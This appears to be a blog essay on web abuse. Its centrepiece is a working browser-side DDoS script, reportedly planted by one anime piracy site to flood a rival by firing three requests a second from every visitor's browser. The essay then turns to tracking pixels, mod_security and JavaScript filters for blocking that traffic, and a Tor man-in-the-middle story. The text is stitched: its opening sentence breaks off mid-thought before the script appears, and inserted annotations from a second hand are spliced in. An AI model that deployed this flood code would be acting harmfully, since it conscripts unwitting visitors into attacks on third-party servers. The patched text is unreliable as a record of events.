Abuse Analysis II

A few years ago, the website formerly known as 9anime was in a dispute with a fellow anime piracy site, Animixplay, accusing the latter of scraping their content. While you may believe that these behind the scenes

// You know, you act like this for our system,
// then this just a gift back to you.
// I already message you but you ignored,
// so just play some games.
// Don't use CloudFlare's shield to handle it, use your brain if you have

// randStr(n) is not defined in the snippet as quoted. This reconstruction
// (a random alphanumeric string of length n) is an assumption, not the original.
function randStr(n) {
    var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
    var s = '';
    for (var i = 0; i < n; i++) {
        s += chars.charAt(Math.floor(Math.random() * chars.length));
    }
    return s;
}

// Runs once per second (1e3 ms) in every visitor's browser; jQuery ($) is
// loaded by the host page. Each tick fires three cross-site requests.
setInterval(function fuckWithMe() {
    // POST to a random search path with a random 'qfast' parameter
    $.ajax('https://animixplay.to/search?' + randStr(10), {
        type: 'POST',
        data: {
            qfast: randStr(10)
        }
    });

    // GET with a random search query
    $.ajax('https://animixplay.to/?q=' + randStr(15));

    // POST to a random API path with a random key/value pair
    var d = {};
    d[randStr(10)] = randStr(10);
    $.ajax('https://animixplay.to/v1/' + randStr(10), {
        type: 'POST',
        data: d
    });
}, 1e3);

Yes, this lovely piece of code fires three requests every second, two of them POSTs, at Animixplay from the browser of every visitor, so the load arrives from thousands of users at once. If you visited 9anime while this script was active, you essentially signed up for a botnet and participated in a DDoS. Regardless, I think that this speaks to how poorly the web is equipped for security. This is not an exploit, nor is it undefined behavior; it is simply emergent behavior of an Internet built around anonymous, unverified scripts that are automatically loaded and run. From the visitor's side there isn't a real defense against this outside of blocking JavaScript entirely, which renders the web unusable and is as such a non-starter for the vast majority of use cases.

There are even more innocuous behaviors that can be used maliciously. Once, I lost a paper and for some reason dumped my entire hard drive to an external HDD[1], including deleted files whose contents were still on the disk but had yet to be overwritten. Perusing through the files, I saw all sorts of familiar thumbnails and images from my web browsing adventures, but what stuck out to me were the thousands of images that were just a single pixel of nothing.

As it turns out, these images are tracking pixels. They are hosted on a separate web server, and the request your browser makes to fetch one carries data about you: your IP address, your User-Agent, the Referer (the page you were on) and any cookie that server has previously set, so every fetch is logged as a visit. Once again, it baffles me that this is NOT an exploit but rather an emergent behavior of allowing cross-site requests. uBlock Origin doesn't even have an option to block small media files (though it can block larger ones), so I can't even defend against it that way; what its filter lists do instead is block known tracker URLs by domain and path, not by size.

I was very curious as to why this attack was also framed as a challenge to the Animixplay administrators to defend against. I'm not a web administrator, so I can't comment authoritatively on what the easy fix for this is without running to Cloudflare for a solution. I believe that because the format is known, you can simply block requests that follow that format (e.g. a POST whose body is exactly 'qfast=' followed by ten random characters, which is what the first $.ajax call above produces) with something like mod_security for an Apache server. Two things worth knowing: rules that inspect the body run in phase 2 and need SecRequestBodyAccess On, and cross-origin POSTs from a browser always carry an Origin header naming the site that embedded the script, which is an even simpler thing to filter on.

SecRequestBodyAccess On

# Only the first rule of a chain carries the id, phase and disruptive action;
# the chained rule adds a second condition that must also match. The body
# shapes below are the two POST bodies the quoted script produces, assuming
# randStr emits characters that need no URL-encoding.
SecRule REQUEST_METHOD "^POST$" "id:1001,phase:2,chain,deny,log,msg:'Animixplay flood pattern'"
    SecRule REQUEST_BODY "@rx ^(qfast=[^&=]{10}|[^&=]{10}=[^&=]{10})$"
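The same idea expressed as application-side logic, as an added example that is not from the page or from either site: a small JavaScript classifier that flags requests matching the fingerprint of the quoted script, blocks anything whose Origin or Referer names the embedding site, and rate-limits by client IP. The hostile origin 'https://attacker.example', the alphabet assumed for randStr, the rate budget and the request-object shape are all assumptions; in a Node/Express app the same fields come from req.method, req.originalUrl, req.headers, req.ip and the raw body string.

```javascript
// Added example (not code from the page or from either site): a server-side
// filter that mirrors the mod_security rule in JavaScript. Request objects are
// plain constructed objects with method, url, body, headers and ip.

const TOKEN = '[A-Za-z0-9]{10}';   // assumed alphabet/length of randStr(10)
const PATTERNS = [
  // POST /search?<10 random chars> with body qfast=<10 random chars>
  { method: 'POST', url: new RegExp('^/search\\?' + TOKEN + '$'),
    body: new RegExp('^qfast=' + TOKEN + '$') },
  // GET /?q=<15 random chars>
  { method: 'GET', url: /^\/\?q=[A-Za-z0-9]{15}$/, body: /^$/ },
  // POST /v1/<10 random chars> with body <10 chars>=<10 chars>
  { method: 'POST', url: new RegExp('^/v1/' + TOKEN + '$'),
    body: new RegExp('^' + TOKEN + '=' + TOKEN + '$') },
];

// Placeholder for the embedding site; the real hostname is not given on the page.
const HOSTILE_ORIGINS = new Set(['https://attacker.example']);

function matchesFingerprint(req) {
  return PATTERNS.some(p =>
    p.method === req.method && p.url.test(req.url) && p.body.test(req.body || ''));
}

// Cross-origin POSTs always carry an Origin header; a browser-issued GET
// usually carries a Referer. Either one naming the embedding site is enough.
function fromHostileSite(req) {
  const h = req.headers || {};
  const origin = h.origin || '';
  const referer = h.referer || '';
  for (const o of HOSTILE_ORIGINS) {
    if (origin === o || referer.startsWith(o + '/')) return true;
  }
  return false;
}

// Sliding-window counter per IP. The script fires 3 requests/s per visitor,
// so a budget of 20 per 10 s trips within seconds while a human searching by
// hand stays well below it.
class RateLimiter {
  constructor(limit, windowMs) {
    this.limit = limit; this.windowMs = windowMs; this.hits = new Map();
  }
  // returns true once the client has exceeded the budget
  hit(ip, now) {
    const times = (this.hits.get(ip) || []).filter(t => now - t < this.windowMs);
    times.push(now);
    this.hits.set(ip, times);
    return times.length > this.limit;
  }
}

function classify(req, limiter, now) {
  if (matchesFingerprint(req)) return 'block:fingerprint';
  if (fromHostileSite(req)) return 'block:origin';
  if (limiter.hit(req.ip, now)) return 'block:rate';
  return 'allow';
}

// Constructed traffic: the three shapes the script sends, a legitimate search,
// and one client replaying a normal-looking GET 25 times in five seconds.
function demo() {
  const limiter = new RateLimiter(20, 10000);
  const t0 = 1700000000000;
  const verdicts = [];
  verdicts.push(classify({ method: 'POST', url: '/search?ab3kd9x1qz',
    body: 'qfast=zz9kd9x1qa', headers: {}, ip: '203.0.113.5' }, limiter, t0));
  verdicts.push(classify({ method: 'GET', url: '/?q=naruto%20shippuden', body: '',
    headers: { referer: 'https://animixplay.to/' }, ip: '198.51.100.7' }, limiter, t0));
  verdicts.push(classify({ method: 'POST', url: '/v1/aaaaaaaaaa',
    body: 'bbbbbbbbbb=cccccccccc', headers: { origin: 'https://attacker.example' },
    ip: '203.0.113.5' }, limiter, t0));
  verdicts.push(classify({ method: 'GET', url: '/?q=onepiece', body: '',
    headers: { referer: 'https://attacker.example/watch/123' }, ip: '203.0.113.6' },
    limiter, t0));
  let rateVerdict = 'allow';
  for (let i = 0; i < 25; i++) {
    rateVerdict = classify({ method: 'GET', url: '/?q=bleach', body: '',
      headers: {}, ip: '10.0.0.9' }, limiter, t0 + i * 200);
  }
  verdicts.push(rateVerdict);
  return verdicts;
}
```

In production the Origin/Referer check would go first, since it is the cheapest and most precise signal; the fingerprint check is ordered first here only so that the demo shows which signal fired. The rate limit is a backstop rather than a primary defense: clients behind a shared NAT can trip it legitimately, so pair it with the header check instead of relying on it alone.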

I think the most absurd story for me occurred in 2021, when a researcher found that 25% of Tor's nodes were operated by a single group. From that position the malicious actor staged sophisticated man-in-the-middle attacks, stripping encryption from websites and modifying Bitcoin addresses to point to their own. Stripping only works on a connection that starts out as plain HTTP, which is what HSTS and a browser's HTTPS-only mode exist to prevent. I don't want to give the impression that Tor as a whole is untenable. It is likely fine for the majority of privacy-conscious users, but I want to dispel the idea that there is a silver bullet for security outside of dismantling your router. The best thing you can do is to disable JavaScript and minimize the number of critical uses of the Internet.

Footnotes:

[1] Okay, in actuality I stopped 40 minutes in after realizing that this was a terrible idea that would take forever.